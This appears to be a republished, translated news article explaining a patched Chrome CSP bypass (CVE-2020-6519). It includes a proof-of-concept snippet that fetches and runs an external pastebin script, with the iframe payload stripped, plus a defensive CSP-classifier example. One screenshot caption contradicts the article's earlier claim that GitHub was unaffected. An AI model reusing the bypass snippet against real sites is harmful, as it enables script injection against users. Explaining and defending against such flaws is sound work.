2025-03-28 Update From: SLTechnology News&Howtos > Network Security
Shulou (Shulou.com) 05/31 Report
The purpose of this article is to explain how the CSP bypass vulnerability in the Chrome browser works. The editor thinks it is very practical, so it is shared here; I hope you get something out of it.
The following describes how the original author found a complete bypass of Google Chrome's Content Security Policy (CSP), CVE-2020-6519, affecting all Chrome versions released after March 2019 and rendering the CSP policies of many large corporate websites completely ineffective against it. The vulnerability eventually earned a $3000 reward from Google.
The tragedy of a complete CSP bypass
I was shocked to discover that this vulnerability exists in the Chrome, Opera and Edge browsers built on the Chromium engine and affects the Windows, Mac and Android platforms; attackers could exploit it to bypass all of Chrome's built-in CSP enforcement from March 2019 to July 2020.
The severity lies in Chrome's reach: with more than 2 billion users and more than 65 per cent of the browser market, the vulnerability could potentially affect billions of users.
In addition, this vulnerability affected the websites of many large companies, such as Facebook, Wells Fargo, Gmail, Zoom, TikTok, Instagram, WhatsApp, Investopedia, ESPN, Roblox, Indeed, Blogger, Quora and so on.
Completely breaking Chrome's CSP restriction with a simple method
If you are interested, you can study the POC verification file published by Google; the cause of the vulnerability is as follows:
Normally, in a Chrome browser on a page with a CSP policy set, executing the following JS script is blocked on the browser side, because the policy does not allow the script's source or the action it performs. (The pastebin link points to a script.)
/* this is a script that pops an alert message */
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';
/* this call will fail due to CSP */
var s = document.createElement("script");
s.src = top._CVE_URL;
document.body.appendChild(s);
However, if the same JS script is run through an iframe whose src is a javascript: URL, it completely breaks Chrome's CSP restriction and the script runs successfully:
/* this is a script that pops an alert message */
top._CVE_URL = 'https://pastebin.com/raw/dw5cWGK6';
/* this call will succeed despite CSP */
document.querySelector('DIV')[xss_clean] = ""
/* the property name and the markup assigned here were stripped by the site's sanitizer ([xss_clean]); per the text above, the assignment writes an iframe whose src is a javascript: URL that runs the script-loading code shown earlier */
It is that simple and crude. As a result, billions of client browsers on any operating system are affected, and an attacker can bypass CSP in the client this way and achieve malicious code execution.
It is important to note that some websites configured with CSP policies are not affected by this vulnerability, such as Twitter, GitHub, LinkedIn, the Google Play Store, Yahoo's login page, PayPal and Yandex. These websites apply server-side nonce or hash verification in their CSP configuration, so they are relatively secure and unaffected.
Vulnerability impact
CSP (Content Security Policy) is a website's access policy: a set of rules that tells the client which external resources may be loaded and executed on the site when the client accesses it.
Under CSP rules, the website can allow or block requests such as JS code in the client browser, protecting client users from attacks such as XSS and forming a security barrier.
To be clear, because an attacker exploiting this vulnerability still needs a way to get a malicious script into the website, the Chrome CSP bypass does not directly affect the website itself, which is why the vulnerability was rated medium risk.
The basic situation is that this CSP bypass flaw in Chrome renders the CSP rules of many websites ineffective. There are two cases: first, websites configured with strict CSP policies, such as Twitter above, whose policies this vulnerability cannot defeat; second, websites configured with general CSP policies, whose CSP can be completely bypassed.
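The two cases above turn on one question: does the policy allow scripts by nonce or hash, or only by host allowlist? The following added example (not code from the original article or its author) parses a Content-Security-Policy header and classifies its script policy accordingly; the sample policies and the nonce/hash values in them are constructed for illustration and do not belong to any real site.

```javascript
// Added example: classify a CSP header's script policy the way the article separates
// "strict" (nonce/hash-based, unaffected) from "general" (host allowlist) policies.

// Parse a CSP header string into a map of directive name -> array of source expressions.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// The sources that govern script execution: script-src, falling back to default-src.
function scriptSources(directives) {
  return directives['script-src'] || directives['default-src'] || null;
}

// Classification:
//   'none'      neither script-src nor default-src is present (scripts unrestricted)
//   'strict'    a nonce- or hash-source is present (browsers then ignore 'unsafe-inline')
//   'unsafe'    'unsafe-inline' without any nonce/hash (inline scripts allowed outright)
//   'allowlist' host/scheme allowlist only, the "general" policies in the text
function classifyScriptPolicy(header) {
  const sources = scriptSources(parseCsp(header));
  if (sources === null) return 'none';
  const lower = sources.map(s => s.toLowerCase());
  const hasNonceOrHash = lower.some(s => /^'(nonce-|sha(256|384|512)-)/.test(s));
  if (hasNonceOrHash) return 'strict';
  if (lower.includes("'unsafe-inline'")) return 'unsafe';
  return 'allowlist';
}

// Constructed sample policies (not taken from any real website).
const SAMPLE_POLICIES = {
  allowlistOnly: "default-src 'self'; script-src 'self' https://cdn.example.com",
  nonceBased: "script-src 'nonce-R4nd0mV4lu3' 'strict-dynamic'; object-src 'none'",
  hashBased: "script-src 'sha256-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='",
  inlineAllowed: "script-src 'self' 'unsafe-inline'",
  noScriptDirective: "img-src 'self'",
};

// Audit every sample and return name -> classification.
function auditSamples() {
  const result = {};
  for (const [name, header] of Object.entries(SAMPLE_POLICIES)) {
    result[name] = classifyScriptPolicy(header);
  }
  return result;
}

console.log(auditSamples());
```

Run it with node to see each sample's classification; only the nonce- and hash-based samples come out as 'strict', which is the configuration the article says kept sites like Twitter unaffected.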
Beyond the websites mentioned above, it can be conservatively estimated that thousands of industry websites, including e-commerce, banking, telecommunications, government and public utilities, are affected, and attackers could exploit this vulnerability to inject malicious code into the client users of these sites.
Some may say that since exploiting this kind of vulnerability requires the attacker to already have code execution on the website, a CSP bypass is not interesting. I don't think so.
Because most websites rely on CSP to protect their clients, the appearance of this kind of flaw is a serious risk to the website's own security mechanism.
Six months ago, I discovered a stored XSS vulnerability in the WhatsApp Web/Desktop applications, which illustrates the great harm that CSP bypass vulnerabilities can cause. The danger of CSP bypass vulnerabilities is that the improper CSP configuration of many websites allows attackers to inject malicious scripts that communicate with domains related to arbitrary websites.
Because of this, although it is very hard to find a code execution vulnerability beyond the administrator's control in a website, once such a vulnerability exists it may pose a fatal threat to the site itself.
Vulnerability testing
I wrote a test script myself and then used Chrome's developer tools to easily test which sites were affected by the vulnerability. The external JS script called in the test is https://pastebin.com/raw/XpHsfXJQ, which triggers the vulnerability.
Screenshot (not reproduced here): how the Facebook website is affected by this vulnerability.
Screenshot (not reproduced here): how the GitHub website is affected by this vulnerability.
Not affected by this vulnerability.
Remediation suggestions
For website operators, first make sure the website has strict CSP rules; second, consider adding server-side nonce or hash verification, a detection mechanism for JS script and malicious code injection, and the usual combination of security policies to keep the website secure. For clients, update Chrome to version 84 or later.
Vulnerability patch
Google's Chromium project team fixed the vulnerability promptly and shipped the patch in Chrome 84; the vulnerability was ultimately rated CVSS 6.5, and the author received a $3000 reward.
That is how the CSP bypass vulnerability in Chrome browsers works. The editor believes it contains knowledge points that may be seen or used in daily work; I hope you can learn more from this article. For more details, please follow the industry information channel.